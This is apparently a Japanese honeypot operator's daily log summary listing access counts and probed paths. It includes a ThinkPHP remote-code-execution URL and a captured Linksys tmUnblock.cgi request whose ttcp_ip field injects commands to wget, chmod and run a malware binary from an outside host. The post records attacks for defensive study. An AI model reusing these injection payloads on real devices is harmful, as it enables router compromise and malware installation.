honeypotの簡易解析11日目

2019-04-11のアクセス数は64件でした。

■送信元IPアドレスの数は 51件です。

■メソッドの一覧と件数は以下です。

method総数 – method
GET55
HEAD4
POST5
合計 結果64

■アクセスパス一覧と件数は以下です。

pathmethod総数 – method
/ GET43
/ HEAD3
/acadmin.phpGET1
/favicon.icoGET1
/index.actionGET1
/index.doGET1
/manager/htmlGET1
/PSIA/indexGET1
/struts2-rest-showcase/orders.xhtmlGET1
/tmUnblock.cgiGET1
/tmUnblock.cgiPOST2
/TP/public/index.phpGET2
/TP/public/index.php?s=captchaPOST2
/TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1GET2
/users?page=&size=5POST1
http://112.124.42.80:63435/HEAD1

気になるlog

-=-=31件目のlog=-=-

[2019-04-11 07:52:27+0900] 122.97.128.130 192.168.0.14:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False
POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+set.mpsl%3B+wget+http%3A%2F%2Fcnc.flexsecurity.xyz%2Fbins%2Fset.mpsl%3B+chmod+777+set.mpsl%3B+.%2Fset.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Start

linksysの脆弱性からのマルウェアダウンロード。

cnc[.]flexsecurity[.]xyz は調査時点で名前解決できず、調査できなかった。

huntinglogに差分が発生したらアラート投げるスクリプト、書きたくなってきた。

URLのvitustotalの結果はこちら